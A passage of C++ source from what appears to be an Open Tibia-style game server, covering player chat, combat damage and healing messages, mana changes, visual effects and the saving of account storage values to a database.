receiver, const std::string& text) { Player* player = getPlayerByID(playerId); if (!player) { return; } player->resetIdleTime(); if (playerSaySpell(player, type, text)) { return; } if (type == TALKTYPE_PRIVATE_PN) { playerSpeakToNpc(player, text); return; } uint32_t muteTime = player->isMuted(); if (muteTime > 0) { player->sendTextMessage(MESSAGE_STATUS_SMALL, fmt::format("You are still muted for {:d} seconds.", muteTime)); return; } if (!text.empty() && text.front() == '/' && player->isAccessPlayer()) { return; } player->removeMessageBuffer(); switch (type) { case TALKTYPE_SAY: internalCreatureSay(player, TALKTYPE_SAY, text, false); break; case TALKTYPE_WHISPER: playerWhisper(player, text); break; case TALKTYPE_YELL: playerYell(player, text); break; case TALKTYPE_PRIVATE_TO: case TALKTYPE_PRIVATE_RED_TO: playerSpeakTo(player, type, receiver, text); break; case TALKTYPE_CHANNEL_O: case TALKTYPE_CHANNEL_Y: case TALKTYPE_CHANNEL_R1: g_chat->talkToChannel(*player, type, text, channelId); break; case TALKTYPE_BROADCAST: playerBroadcastMessage(player, text); break; default: break; } } bool Game::playerSaySpell(Player* player, SpeakClasses type, const std::string& text) { std::string words = text; TalkActionResult_t result = g_talkActions->playerSaySpell(player, type, words); if (result == TALKACTION_BREAK) { return true; } result = g_spells->playerSaySpell(player, words); if (result == TALKACTION_BREAK) { if (!g_config.getBoolean(ConfigManager::EMOTE_SPELLS)) { return internalCreatureSay(player, TALKTYPE_SAY, words, false); } else { return internalCreatureSay(player, TALKTYPE_MONSTER_SAY, words, false); } } else if (result == TALKACTION_FAILED) { return true; } return false; } void Game::playerWhisper(Player* player, const std::string& text) { SpectatorVec spectators; map.getSpectators(spectators, player->getPosition(), false, false, Map::maxClientViewportX, Map::maxClientViewportX, Map::maxClientViewportY, Map::maxClientViewportY); //send to client for (Creature* spectator : spectators) { if (Player* spectatorPlayer = spectator->getPlayer()) { if 
(!Position::areInRange<1, 1>(player->getPosition(), spectatorPlayer->getPosition())) { spectatorPlayer->sendCreatureSay(player, TALKTYPE_WHISPER, "pspsps"); } else { spectatorPlayer->sendCreatureSay(player, TALKTYPE_WHISPER, text); } } } //event method for (Creature* spectator : spectators) { spectator->onCreatureSay(player, TALKTYPE_WHISPER, text); } } bool Game::playerYell(Player* player, const std::string& text) { if (player->hasCondition(CONDITION_YELLTICKS)) { player->sendCancelMessage(RETURNVALUE_YOUAREEXHAUSTED); return false; } if (!player->isAccessPlayer() && !player->hasFlag(PlayerFlag_IgnoreYellCheck)) { uint32_t minimumLevel = g_config.getNumber(ConfigManager::YELL_MINIMUM_LEVEL); if (player->getLevel() < minimumLevel) { if (g_config.getBoolean(ConfigManager::YELL_ALLOW_PREMIUM)) { if (!player->isPremium()) { player->sendTextMessage(MESSAGE_STATUS_SMALL, fmt::format("You may not yell unless you have reached level {:d} or have a premium account.", minimumLevel)); return false; } } else { player->sendTextMessage(MESSAGE_STATUS_SMALL, fmt::format("You may not yell unless you have reached level {:d}.", minimumLevel)); return false; } } Condition* condition = Condition::createCondition(CONDITIONID_DEFAULT, CONDITION_YELLTICKS, 30000, 0); player->addCondition(condition); } internalCreatureSay(player, TALKTYPE_YELL, asUpperCaseString(text), false); return true; } bool Game::playerSpeakTo(Player* player, SpeakClasses type, const std::string& receiver, const std::string& text) { Player* toPlayer = getPlayerByName(receiver); if (!toPlayer) { player->sendTextMessage(MESSAGE_STATUS_SMALL, "A player with this name is not online."); return false; } if (type == TALKTYPE_PRIVATE_RED_TO && (player->hasFlag(PlayerFlag_CanTalkRedPrivate) || player->getAccountType() >= ACCOUNT_TYPE_GAMEMASTER)) { type = TALKTYPE_PRIVATE_RED_FROM; } else { type = TALKTYPE_PRIVATE_FROM; } if (!player->isAccessPlayer() && !player->hasFlag(PlayerFlag_IgnoreSendPrivateCheck)) { uint32_t minimumLevel = g_config.getNumber(ConfigManager::MINIMUM_LEVEL_TO_SEND_PRIVATE); if (player->getLevel() < minimumLevel) { if (g_config.getBoolean(ConfigManager::PREMIUM_TO_SEND_PRIVATE)) { if (!player->isPremium()) { player->sendTextMessage(MESSAGE_STATUS_SMALL, fmt::format("You may not send private messages unless you have reached level {:d} or have a premium account.", minimumLevel)); return false; } } else { player->sendTextMessage(MESSAGE_STATUS_SMALL, fmt::format("You may not send private messages unless you have reached level {:d}.", minimumLevel)); return false; } } } toPlayer->sendPrivateMessage(player, type, text); toPlayer->onCreatureSay(player, type, text); if (toPlayer->isInGhostMode() && !player->canSeeGhostMode(toPlayer)) { player->sendTextMessage(MESSAGE_STATUS_SMALL, "A player with this name is not online."); } else { player->sendTextMessage(MESSAGE_STATUS_SMALL, fmt::format("Message sent to {:s}.", toPlayer->getName())); } return true; } void Game::playerSpeakToNpc(Player* player, const std::string& text) { SpectatorVec spectators; map.getSpectators(spectators, player->getPosition()); for (Creature* spectator : spectators) { if (spectator->getNpc()) { spectator->onCreatureSay(player, TALKTYPE_PRIVATE_PN, text); } } } //-- bool Game::canThrowObjectTo(const Position& fromPos, const Position& toPos, bool checkLineOfSight /*= true*/, bool sameFloor /*= false*/, int32_t rangex /*= Map::maxClientViewportX*/, int32_t rangey /*= Map::maxClientViewportY*/) const { return map.canThrowObjectTo(fromPos, toPos, checkLineOfSight, 
sameFloor, rangex, rangey); } bool Game::isSightClear(const Position& fromPos, const Position& toPos, bool sameFloor /*= false*/) const { return map.isSightClear(fromPos, toPos, sameFloor); } bool Game::internalCreatureTurn(Creature* creature, Direction dir) { if (creature->getDirection() == dir) { return false; } creature->setDirection(dir); //send to client SpectatorVec spectators; map.getSpectators(spectators, creature->getPosition(), true, true); for (Creature* spectator : spectators) { spectator->getPlayer()->sendCreatureTurn(creature); } return true; } bool Game::internalCreatureSay(Creature* creature, SpeakClasses type, const std::string& text, bool ghostMode, SpectatorVec* spectatorsPtr/* = nullptr*/, const Position* pos/* = nullptr*/) { if (text.empty()) { return false; } if (!pos) { pos = &creature->getPosition(); } SpectatorVec spectators; if (!spectatorsPtr || spectatorsPtr->empty()) { // This somewhat complex construct ensures that the cached SpectatorVec // is used if available and if it can be used, else a local vector is // used (hopefully the compiler will optimize away the construction of // the temporary when it's not used). if (type != TALKTYPE_YELL && type != TALKTYPE_MONSTER_YELL) { map.getSpectators(spectators, *pos, false, false, Map::maxClientViewportX, Map::maxClientViewportX, Map::maxClientViewportY, Map::maxClientViewportY); } else { map.getSpectators(spectators, *pos, true, false, (Map::maxClientViewportX * 2) + 2, (Map::maxClientViewportX * 2) + 2, (Map::maxClientViewportY * 2) + 2, (Map::maxClientViewportY * 2) + 2); } } else { spectators = (*spectatorsPtr); } //send to client for (Creature* spectator : spectators) { if (Player* tmpPlayer = spectator->getPlayer()) { if (!ghostMode || tmpPlayer->canSeeCreature(creature)) { tmpPlayer->sendCreatureSay(creature, type, text, pos); } } } //event method for (Creature* spectator : spectators) { spectator->onCreatureSay(creature, type, text); if (creature != spectator) { g_events->eventCreatureOnHear(spectator, creature, text, type); } } return true; } void Game::checkCreatureWalk(uint32_t creatureId) { Creature* creature = getCreatureByID(creatureId); if (creature && creature->getHealth() > 0) { creature->onWalk(); cleanup(); } } void Game::updateCreatureWalk(uint32_t creatureId) { Creature* creature = getCreatureByID(creatureId); if (creature && creature->getHealth() > 0) { creature->goToFollowCreature(); } } void Game::checkCreatureAttack(uint32_t creatureId) { Creature* creature = getCreatureByID(creatureId); if (creature && creature->getHealth() > 0) { creature->onAttacking(0); } } void Game::addCreatureCheck(Creature* creature) { creature->creatureCheck = true; if (creature->inCheckCreaturesVector) { // already in a vector return; } creature->inCheckCreaturesVector = true; checkCreatureLists[uniform_random(0, EVENT_CREATURECOUNT - 1)].push_back(creature); creature->incrementReferenceCounter(); } void Game::removeCreatureCheck(Creature* creature) { if (creature->inCheckCreaturesVector) { creature->creatureCheck = false; } } void Game::checkCreatures(size_t index) { g_scheduler.addEvent(createSchedulerTask(EVENT_CHECK_CREATURE_INTERVAL, std::bind(&Game::checkCreatures, this, (index + 1) % EVENT_CREATURECOUNT))); auto& checkCreatureList = checkCreatureLists[index]; auto it = checkCreatureList.begin(), end = checkCreatureList.end(); while (it != end) { Creature* creature = *it; if (creature->creatureCheck) { if (creature->getHealth() > 0) { creature->onThink(EVENT_CREATURE_THINK_INTERVAL); 
creature->onAttacking(EVENT_CREATURE_THINK_INTERVAL); creature->executeConditions(EVENT_CREATURE_THINK_INTERVAL); } ++it; } else { creature->inCheckCreaturesVector = false; it = checkCreatureList.erase(it); ReleaseCreature(creature); } } cleanup(); } void Game::changeSpeed(Creature* creature, int32_t varSpeedDelta) { int32_t varSpeed = creature->getSpeed() - creature->getBaseSpeed(); varSpeed += varSpeedDelta; creature->setSpeed(varSpeed); //send to clients SpectatorVec spectators; map.getSpectators(spectators, creature->getPosition(), false, true); for (Creature* spectator : spectators) { spectator->getPlayer()->sendChangeSpeed(creature, creature->getStepSpeed()); } } void Game::internalCreatureChangeOutfit(Creature* creature, const Outfit_t& outfit) { if (!g_events->eventCreatureOnChangeOutfit(creature, outfit)) { return; } creature->setCurrentOutfit(outfit); if (creature->isInvisible()) { return; } //send to clients SpectatorVec spectators; map.getSpectators(spectators, creature->getPosition(), true, true); for (Creature* spectator : spectators) { spectator->getPlayer()->sendCreatureChangeOutfit(creature, outfit); } } void Game::internalCreatureChangeVisible(Creature* creature, bool visible) { //send to clients SpectatorVec spectators; map.getSpectators(spectators, creature->getPosition(), true, true); for (Creature* spectator : spectators) { spectator->getPlayer()->sendCreatureChangeVisible(creature, visible); } } void Game::changeLight(const Creature* creature) { //send to clients SpectatorVec spectators; map.getSpectators(spectators, creature->getPosition(), true, true); for (Creature* spectator : spectators) { spectator->getPlayer()->sendCreatureLight(creature); } } bool Game::combatBlockHit(CombatDamage& damage, Creature* attacker, Creature* target, bool checkDefense, bool checkArmor, bool field, bool ignoreResistances /*= false */) { if (damage.primary.type == COMBAT_NONE && damage.secondary.type == COMBAT_NONE) { return true; } if (target->getPlayer() && target->isInGhostMode()) { return true; } if (damage.primary.value > 0) { return false; } static const auto sendBlockEffect = [this](BlockType_t blockType, CombatType_t combatType, const Position& targetPos) { if (blockType == BLOCK_DEFENSE) { addMagicEffect(targetPos, CONST_ME_POFF); } else if (blockType == BLOCK_ARMOR) { addMagicEffect(targetPos, CONST_ME_BLOCKHIT); } else if (blockType == BLOCK_IMMUNITY) { uint8_t hitEffect = 0; switch (combatType) { case COMBAT_UNDEFINEDDAMAGE: { return; } case COMBAT_ENERGYDAMAGE: case COMBAT_FIREDAMAGE: case COMBAT_PHYSICALDAMAGE: case COMBAT_ICEDAMAGE: case COMBAT_DEATHDAMAGE: { hitEffect = CONST_ME_BLOCKHIT; break; } case COMBAT_EARTHDAMAGE: { hitEffect = CONST_ME_GREEN_RINGS; break; } case COMBAT_HOLYDAMAGE: { hitEffect = CONST_ME_HOLYDAMAGE; break; } default: { hitEffect = CONST_ME_POFF; break; } } addMagicEffect(targetPos, hitEffect); } }; BlockType_t primaryBlockType, secondaryBlockType; if (damage.primary.type != COMBAT_NONE) { damage.primary.value = -damage.primary.value; primaryBlockType = target->blockHit(attacker, damage.primary.type, damage.primary.value, checkDefense, checkArmor, field, ignoreResistances); damage.primary.value = -damage.primary.value; sendBlockEffect(primaryBlockType, damage.primary.type, target->getPosition()); } else { primaryBlockType = BLOCK_NONE; } if (damage.secondary.type != COMBAT_NONE) { damage.secondary.value = -damage.secondary.value; secondaryBlockType = target->blockHit(attacker, damage.secondary.type, damage.secondary.value, false, false, field, 
ignoreResistances); damage.secondary.value = -damage.secondary.value; sendBlockEffect(secondaryBlockType, damage.secondary.type, target->getPosition()); } else { secondaryBlockType = BLOCK_NONE; } damage.blockType = primaryBlockType; return (primaryBlockType != BLOCK_NONE) && (secondaryBlockType != BLOCK_NONE); } void Game::combatGetTypeInfo(CombatType_t combatType, Creature* target, TextColor_t& color, uint8_t& effect) { switch (combatType) { case COMBAT_PHYSICALDAMAGE: { Item* splash = nullptr; switch (target->getRace()) { case RACE_VENOM: color = TEXTCOLOR_LIGHTGREEN; effect = CONST_ME_HITBYPOISON; splash = Item::CreateItem(ITEM_SMALLSPLASH, FLUID_SLIME); break; case RACE_BLOOD: color = TEXTCOLOR_RED; effect = CONST_ME_DRAWBLOOD; if (const Tile* tile = target->getTile()) { if (!tile->hasFlag(TILESTATE_PROTECTIONZONE)) { splash = Item::CreateItem(ITEM_SMALLSPLASH, FLUID_BLOOD); } } break; case RACE_UNDEAD: color = TEXTCOLOR_LIGHTGREY; effect = CONST_ME_HITAREA; break; case RACE_FIRE: color = TEXTCOLOR_ORANGE; effect = CONST_ME_DRAWBLOOD; break; case RACE_ENERGY: color = TEXTCOLOR_ELECTRICPURPLE; effect = CONST_ME_ENERGYHIT; break; default: color = TEXTCOLOR_NONE; effect = CONST_ME_NONE; break; } if (splash) { internalAddItem(target->getTile(), splash, INDEX_WHEREEVER, FLAG_NOLIMIT); startDecay(splash); } break; } case COMBAT_ENERGYDAMAGE: { color = TEXTCOLOR_ELECTRICPURPLE; effect = CONST_ME_ENERGYHIT; break; } case COMBAT_EARTHDAMAGE: { color = TEXTCOLOR_LIGHTGREEN; effect = CONST_ME_GREEN_RINGS; break; } case COMBAT_DROWNDAMAGE: { color = TEXTCOLOR_LIGHTBLUE; effect = CONST_ME_LOSEENERGY; break; } case COMBAT_FIREDAMAGE: { color = TEXTCOLOR_ORANGE; effect = CONST_ME_HITBYFIRE; break; } case COMBAT_ICEDAMAGE: { color = TEXTCOLOR_SKYBLUE; effect = CONST_ME_ICEATTACK; break; } case COMBAT_HOLYDAMAGE: { color = TEXTCOLOR_YELLOW; effect = CONST_ME_HOLYDAMAGE; break; } case COMBAT_DEATHDAMAGE: { color = TEXTCOLOR_DARKRED; effect = CONST_ME_SMALLCLOUDS; break; } case COMBAT_LIFEDRAIN: { color = TEXTCOLOR_RED; effect = CONST_ME_MAGIC_RED; break; } default: { color = TEXTCOLOR_NONE; effect = CONST_ME_NONE; break; } } } bool Game::combatChangeHealth(Creature* attacker, Creature* target, CombatDamage& damage) { const Position& targetPos = target->getPosition(); if (damage.primary.value > 0) { if (target->getHealth() <= 0) { return false; } Player* attackerPlayer; if (attacker) { attackerPlayer = attacker->getPlayer(); } else { attackerPlayer = nullptr; } Player* targetPlayer = target->getPlayer(); if (attackerPlayer && targetPlayer && attackerPlayer->getSkull() == SKULL_BLACK && attackerPlayer->getSkullClient(targetPlayer) == SKULL_NONE) { return false; } if (damage.origin != ORIGIN_NONE) { const auto& events = target->getCreatureEvents(CREATURE_EVENT_HEALTHCHANGE); if (!events.empty()) { for (CreatureEvent* creatureEvent : events) { creatureEvent->executeHealthChange(target, attacker, damage); } damage.origin = ORIGIN_NONE; return combatChangeHealth(attacker, target, damage); } } int32_t realHealthChange = target->getHealth(); target->gainHealth(attacker, damage.primary.value); realHealthChange = target->getHealth() - realHealthChange; if (realHealthChange > 0 && !target->isInGhostMode()) { auto damageString = fmt::format("{:d} hitpoint{:s}", realHealthChange, realHealthChange != 1 ? 
"s" : ""); std::string spectatorMessage; TextMessage message; message.position = targetPos; message.primary.value = realHealthChange; message.primary.color = TEXTCOLOR_PASTELRED; SpectatorVec spectators; map.getSpectators(spectators, targetPos, false, true); for (Creature* spectator : spectators) { Player* tmpPlayer = spectator->getPlayer(); if (tmpPlayer == attackerPlayer && attackerPlayer != targetPlayer) { message.type = MESSAGE_HEALED; message.text = fmt::format("You heal {:s} for {:s}.", target->getNameDescription(), damageString); } else if (tmpPlayer == targetPlayer) { message.type = MESSAGE_HEALED; if (!attacker) { message.text = fmt::format("You were healed for {:s}.", damageString); } else if (targetPlayer == attackerPlayer) { message.text = fmt::format("You healed yourself for {:s}.", damageString); } else { message.text = fmt::format("You were healed by {:s} for {:s}.", attacker->getNameDescription(), damageString); } } else { message.type = MESSAGE_HEALED_OTHERS; if (spectatorMessage.empty()) { if (!attacker) { spectatorMessage = fmt::format("{:s} was healed for {:s}.", target->getNameDescription(), damageString); } else if (attacker == target) { spectatorMessage = fmt::format("{:s} healed {:s}self for {:s}.", attacker->getNameDescription(), targetPlayer ? (targetPlayer->getSex() == PLAYERSEX_FEMALE ? "her" : "him") : "it", damageString); } else { spectatorMessage = fmt::format("{:s} healed {:s} for {:s}.", attacker->getNameDescription(), target->getNameDescription(), damageString); } spectatorMessage[0] = std::toupper(spectatorMessage[0]); } message.text = spectatorMessage; } tmpPlayer->sendTextMessage(message); } } } else { if (!target->isAttackable()) { if (!target->isInGhostMode()) { addMagicEffect(targetPos, CONST_ME_POFF); } return true; } Player* attackerPlayer; if (attacker) { attackerPlayer = attacker->getPlayer(); } else { attackerPlayer = nullptr; } Player* targetPlayer = target->getPlayer(); if (attackerPlayer && targetPlayer && attackerPlayer->getSkull() == SKULL_BLACK && attackerPlayer->getSkullClient(targetPlayer) == SKULL_NONE) { return false; } damage.primary.value = std::abs(damage.primary.value); damage.secondary.value = std::abs(damage.secondary.value); int32_t healthChange = damage.primary.value + damage.secondary.value; if (healthChange == 0) { return true; } TextMessage message; message.position = targetPos; SpectatorVec spectators; if (targetPlayer && target->hasCondition(CONDITION_MANASHIELD) && damage.primary.type != COMBAT_UNDEFINEDDAMAGE) { int32_t manaDamage = std::min<int32_t>(targetPlayer->getMana(), healthChange); if (manaDamage != 0) { if (damage.origin != ORIGIN_NONE) { const auto& events = target->getCreatureEvents(CREATURE_EVENT_MANACHANGE); if (!events.empty()) { for (CreatureEvent* creatureEvent : events) { creatureEvent->executeManaChange(target, attacker, damage); } healthChange = damage.primary.value + damage.secondary.value; if (healthChange == 0) { return true; } manaDamage = std::min<int32_t>(targetPlayer->getMana(), healthChange); } } targetPlayer->drainMana(attacker, manaDamage); map.getSpectators(spectators, targetPos, true, true); addMagicEffect(spectators, targetPos, CONST_ME_LOSEENERGY); std::string spectatorMessage; message.primary.value = manaDamage; message.primary.color = TEXTCOLOR_BLUE; for (Creature* spectator : spectators) { Player* tmpPlayer = spectator->getPlayer(); if (tmpPlayer->getPosition().z != targetPos.z) { continue; } if (tmpPlayer == attackerPlayer && attackerPlayer != targetPlayer) { message.type = 
MESSAGE_DAMAGE_DEALT; message.text = fmt::format("{:s} loses {:d} mana due to your attack.", target->getNameDescription(), manaDamage); message.text[0] = std::toupper(message.text[0]); } else if (tmpPlayer == targetPlayer) { message.type = MESSAGE_DAMAGE_RECEIVED; if (!attacker) { message.text = fmt::format("You lose {:d} mana.", manaDamage); } else if (targetPlayer == attackerPlayer) { message.text = fmt::format("You lose {:d} mana due to your own attack.", manaDamage); } else { message.text = fmt::format("You lose {:d} mana due to an attack by {:s}.", manaDamage, attacker->getNameDescription()); } } else { message.type = MESSAGE_DAMAGE_OTHERS; if (spectatorMessage.empty()) { if (!attacker) { spectatorMessage = fmt::format("{:s} loses {:d} mana.", target->getNameDescription(), manaDamage); } else if (attacker == target) { spectatorMessage = fmt::format("{:s} loses {:d} mana due to {:s} own attack.", target->getNameDescription(), manaDamage, targetPlayer->getSex() == PLAYERSEX_FEMALE ? "her" : "his"); } else { spectatorMessage = fmt::format("{:s} loses {:d} mana due to an attack by {:s}.", target->getNameDescription(), manaDamage, attacker->getNameDescription()); } spectatorMessage[0] = std::toupper(spectatorMessage[0]); } message.text = spectatorMessage; } tmpPlayer->sendTextMessage(message); } damage.primary.value -= manaDamage; if (damage.primary.value < 0) { damage.secondary.value = std::max<int32_t>(0, damage.secondary.value + damage.primary.value); damage.primary.value = 0; } } } int32_t realDamage = damage.primary.value + damage.secondary.value; if (realDamage == 0) { return true; } if (damage.origin != ORIGIN_NONE) { const auto& events = target->getCreatureEvents(CREATURE_EVENT_HEALTHCHANGE); if (!events.empty()) { for (CreatureEvent* creatureEvent : events) { creatureEvent->executeHealthChange(target, attacker, damage); } damage.origin = ORIGIN_NONE; return combatChangeHealth(attacker, target, damage); } } int32_t targetHealth = target->getHealth(); if (damage.primary.value >= targetHealth) { damage.primary.value = targetHealth; damage.secondary.value = 0; } else if (damage.secondary.value) { damage.secondary.value = std::min<int32_t>(damage.secondary.value, targetHealth - damage.primary.value); } realDamage = damage.primary.value + damage.secondary.value; if (realDamage == 0) { return true; } if (spectators.empty()) { map.getSpectators(spectators, targetPos, true, true); } message.primary.value = damage.primary.value; message.secondary.value = damage.secondary.value; uint8_t hitEffect; if (message.primary.value) { combatGetTypeInfo(damage.primary.type, target, message.primary.color, hitEffect); if (hitEffect != CONST_ME_NONE) { addMagicEffect(spectators, targetPos, hitEffect); } } if (message.secondary.value) { combatGetTypeInfo(damage.secondary.type, target, message.secondary.color, hitEffect); if (hitEffect != CONST_ME_NONE) { addMagicEffect(spectators, targetPos, hitEffect); } } if (message.primary.color != TEXTCOLOR_NONE || message.secondary.color != TEXTCOLOR_NONE) { auto damageString = fmt::format("{:d} hitpoint{:s}", realDamage, realDamage != 1 ? 
"s" : ""); std::string spectatorMessage; for (Creature* spectator : spectators) { Player* tmpPlayer = spectator->getPlayer(); if (tmpPlayer->getPosition().z != targetPos.z) { continue; } if (tmpPlayer == attackerPlayer && attackerPlayer != targetPlayer) { message.type = MESSAGE_DAMAGE_DEALT; message.text = fmt::format("{:s} loses {:s} due to your attack.", target->getNameDescription(), damageString); message.text[0] = std::toupper(message.text[0]); } else if (tmpPlayer == targetPlayer) { message.type = MESSAGE_DAMAGE_RECEIVED; if (!attacker) { message.text = fmt::format("You lose {:s}.", damageString); } else if (targetPlayer == attackerPlayer) { message.text = fmt::format("You lose {:s} due to your own attack.", damageString); } else { message.text = fmt::format("You lose {:s} due to an attack by {:s}.", damageString, attacker->getNameDescription()); } } else { message.type = MESSAGE_DAMAGE_OTHERS; if (spectatorMessage.empty()) { if (!attacker) { spectatorMessage = fmt::format("{:s} loses {:s}.", target->getNameDescription(), damageString); } else if (attacker == target) { spectatorMessage = fmt::format("{:s} loses {:s} due to {:s} own attack.", target->getNameDescription(), damageString, targetPlayer ? (targetPlayer->getSex() == PLAYERSEX_FEMALE ? "her" : "his") : "its"); } else { spectatorMessage = fmt::format("{:s} loses {:s} due to an attack by {:s}.", target->getNameDescription(), damageString, attacker->getNameDescription()); } spectatorMessage[0] = std::toupper(spectatorMessage[0]); } message.text = spectatorMessage; } tmpPlayer->sendTextMessage(message); } } if (realDamage >= targetHealth) { for (CreatureEvent* creatureEvent : target->getCreatureEvents(CREATURE_EVENT_PREPAREDEATH)) { if (!creatureEvent->executeOnPrepareDeath(target, attacker)) { return false; } } } target->drainHealth(attacker, realDamage); addCreatureHealth(spectators, target); } return true; } bool Game::combatChangeMana(Creature* attacker, Creature* target, CombatDamage& damage) { Player* targetPlayer = target->getPlayer(); if (!targetPlayer) { return true; } int32_t manaChange = damage.primary.value + damage.secondary.value; if (manaChange > 0) { if (attacker) { const Player* attackerPlayer = attacker->getPlayer(); if (attackerPlayer && attackerPlayer->getSkull() == SKULL_BLACK && attackerPlayer->getSkullClient(target) == SKULL_NONE) { return false; } } if (damage.origin != ORIGIN_NONE) { const auto& events = target->getCreatureEvents(CREATURE_EVENT_MANACHANGE); if (!events.empty()) { for (CreatureEvent* creatureEvent : events) { creatureEvent->executeManaChange(target, attacker, damage); } damage.origin = ORIGIN_NONE; return combatChangeMana(attacker, target, damage); } } int32_t realManaChange = targetPlayer->getMana(); targetPlayer->changeMana(manaChange); realManaChange = targetPlayer->getMana() - realManaChange; if (realManaChange > 0 && !targetPlayer->isInGhostMode()) { TextMessage message(MESSAGE_HEALED, "You gained " + std::to_string(realManaChange) + " mana."); message.position = target->getPosition(); message.primary.value = realManaChange; message.primary.color = TEXTCOLOR_MAYABLUE; targetPlayer->sendTextMessage(message); } } else { const Position& targetPos = target->getPosition(); if (!target->isAttackable()) { if (!target->isInGhostMode()) { addMagicEffect(targetPos, CONST_ME_POFF); } return false; } Player* attackerPlayer; if (attacker) { attackerPlayer = attacker->getPlayer(); } else { attackerPlayer = nullptr; } if (attackerPlayer && attackerPlayer->getSkull() == SKULL_BLACK && 
attackerPlayer->getSkullClient(targetPlayer) == SKULL_NONE) { return false; } int32_t manaLoss = std::min<int32_t>(targetPlayer->getMana(), -manaChange); BlockType_t blockType = target->blockHit(attacker, COMBAT_MANADRAIN, manaLoss); if (blockType != BLOCK_NONE) { addMagicEffect(targetPos, CONST_ME_POFF); return false; } if (manaLoss <= 0) { return true; } if (damage.origin != ORIGIN_NONE) { const auto& events = target->getCreatureEvents(CREATURE_EVENT_MANACHANGE); if (!events.empty()) { for (CreatureEvent* creatureEvent : events) { creatureEvent->executeManaChange(target, attacker, damage); } damage.origin = ORIGIN_NONE; return combatChangeMana(attacker, target, damage); } } targetPlayer->drainMana(attacker, manaLoss); std::string spectatorMessage; TextMessage message; message.position = targetPos; message.primary.value = manaLoss; message.primary.color = TEXTCOLOR_BLUE; SpectatorVec spectators; map.getSpectators(spectators, targetPos, false, true); for (Creature* spectator : spectators) { Player* tmpPlayer = spectator->getPlayer(); if (tmpPlayer == attackerPlayer && attackerPlayer != targetPlayer) { message.type = MESSAGE_DAMAGE_DEALT; message.text = fmt::format("{:s} loses {:d} mana due to your attack.", target->getNameDescription(), manaLoss); message.text[0] = std::toupper(message.text[0]); } else if (tmpPlayer == targetPlayer) { message.type = MESSAGE_DAMAGE_RECEIVED; if (!attacker) { message.text = fmt::format("You lose {:d} mana.", manaLoss); } else if (targetPlayer == attackerPlayer) { message.text = fmt::format("You lose {:d} mana due to your own attack.", manaLoss); } else { message.text = fmt::format("You lose {:d} mana due to an attack by {:s}.", manaLoss, attacker->getNameDescription()); } } else { message.type = MESSAGE_DAMAGE_OTHERS; if (spectatorMessage.empty()) { if (!attacker) { spectatorMessage = fmt::format("{:s} loses {:d} mana.", target->getNameDescription(), manaLoss); } else if (attacker == target) { spectatorMessage = fmt::format("{:s} loses {:d} mana due to {:s} own attack.", target->getNameDescription(), manaLoss, targetPlayer->getSex() == PLAYERSEX_FEMALE ? 
"her" : "his"); } else { spectatorMessage = fmt::format("{:s} loses {:d} mana due to an attack by {:s}.", target->getNameDescription(), manaLoss, attacker->getNameDescription()); } spectatorMessage[0] = std::toupper(spectatorMessage[0]); } message.text = spectatorMessage; } tmpPlayer->sendTextMessage(message); } } return true; } void Game::addCreatureHealth(const Creature* target) { SpectatorVec spectators; map.getSpectators(spectators, target->getPosition(), true, true); addCreatureHealth(spectators, target); } void Game::addCreatureHealth(const SpectatorVec& spectators, const Creature* target) { for (Creature* spectator : spectators) { if (Player* tmpPlayer = spectator->getPlayer()) { tmpPlayer->sendCreatureHealth(target); } } } void Game::addMagicEffect(const Position& pos, uint8_t effect) { SpectatorVec spectators; map.getSpectators(spectators, pos, true, true); addMagicEffect(spectators, pos, effect); } void Game::addMagicEffect(const SpectatorVec& spectators, const Position& pos, uint8_t effect) { for (Creature* spectator : spectators) { if (Player* tmpPlayer = spectator->getPlayer()) { tmpPlayer->sendMagicEffect(pos, effect); } } } void Game::addDistanceEffect(const Position& fromPos, const Position& toPos, uint8_t effect) { SpectatorVec spectators, toPosSpectators; map.getSpectators(spectators, fromPos, false, true); map.getSpectators(toPosSpectators, toPos, false, true); spectators.addSpectators(toPosSpectators); addDistanceEffect(spectators, fromPos, toPos, effect); } void Game::addDistanceEffect(const SpectatorVec& spectators, const Position& fromPos, const Position& toPos, uint8_t effect) { for (Creature* spectator : spectators) { if (Player* tmpPlayer = spectator->getPlayer()) { tmpPlayer->sendDistanceShoot(fromPos, toPos, effect); } } } void Game::setAccountStorageValue(const uint32_t accountId, const uint32_t key, const int32_t value) { if (value == -1) { accountStorageMap[accountId].erase(key); return; } accountStorageMap[accountId][key] = value; } int32_t Game::getAccountStorageValue(const uint32_t accountId, const uint32_t key) const { const auto& accountMapIt = accountStorageMap.find(accountId); if (accountMapIt != accountStorageMap.end()) { const auto& storageMapIt = accountMapIt->second.find(key); if (storageMapIt != accountMapIt->second.end()) { return storageMapIt->second; } } return -1; } void Game::loadAccountStorageValues() { Database& db = Database::getInstance(); DBResult_ptr result; if ((result = db.storeQuery("SELECT `account_id`, `key`, `value` FROM `account_storage`"))) { do { g_game.setAccountStorageValue(result->getNumber<uint32_t>("account_id"), result->getNumber<uint32_t>("key"), result->getNumber<int32_t>("value")); } while (result->next()); } } bool Game::saveAccountStorageValues() const { DBTransaction transaction; Database& db = Database::getInstance(); if (!transaction.begin()) { return false; } if (!db.executeQuery("DELETE FROM `account_storage`")) { return false; } for (const auto& accountIt : g_game.accountStorageMap) { if (accountIt.second.empty()) { continue; } DBInsert accountStorageQuery("INSERT INTO `account_storage` (`account_id`, `key`, `value`) VALUES"); for (const auto& storageIt : accountIt.second) { if (!accountStorageQuery.addRow(fmt::format("{:d}, {:d}, {:d}", accountIt.first, storageIt.first, storageIt.second))) { return false; } } if (!accountStorageQuery.execute()) { return false; } } return transaction.commit(); } void Game::startDecay(Item* item) { if (!item || !item->canDecay()) { return; } ItemDecayState_t decayState = 
